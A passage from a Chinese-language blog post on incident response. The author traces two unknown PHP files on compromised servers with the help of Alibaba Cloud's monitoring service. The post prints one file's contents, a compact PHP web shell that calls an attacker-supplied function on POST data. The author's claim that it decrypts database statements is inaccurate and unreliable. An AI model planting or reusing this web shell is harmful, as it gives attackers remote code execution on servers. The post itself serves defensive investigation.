2、调整后的策略(如有多个域名,都调整过来),如下图:
防护策略调整过了,还需要把问题根源找到啊,这才是最重要的!!!
查找可疑文件
此时,php的项目源码分布在好几台服务器上,如果靠传统方式去排查,挨个检查这些服务器的目录,各种能用的命令都用上了,是不是也挺费劲费时的,还不知道要查到啥时候。这个时候,阿里有项服务起到关键的作用了:“态势感知”,这个需要升级为企业版本(费用不高,我们公司开通了一年,费用6000多块)。这就是用阿里的好处(不是打广告),确实让你省心。
1、进入“态势感知”查看一下,就立马发现了一堆异常行为,遍布在好几台服务器上如下图:
2、点几个异常行为进入看看,我就打开其中两个行为看一下,其它的行为也都差不多,如下图:
从命令行参数中可以看出相关目录有/Mode/Lite/ ,并且给出的解决方案是及时排查可疑目录下的信息并及时清除。笔者顺着给出的提示在服务器上进行 find 相关目录,查找出目录所在路径,如下图:
顺藤摸瓜吧,列一下这个目录的文件:
从上图发现了有两个异常的php文件,目录属主也和其它文件不一样,笔者打开代码仓库也进入相同的目录进行比对,代码仓库中确实没有这两个文件。为了确认清楚,把这两个文件down下来发给开发。开发说项目中没有这两个文件。把它down下来打开文件看看:
Content.class.php文件内容:
<?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>
}这代码不就是被注入的表里的字段吗,上面这段代码大概意思为:把post请求的两个参数,一个用base64解密,一个用hex2bin转成16进制,然后拼接在一起,应该是把操作数据库的语句加密传过来,然后解密,这样就不会被拦截掉。如果哪位博友认为解释的有误,一定要提出来。
Lite.class.php文件内容:
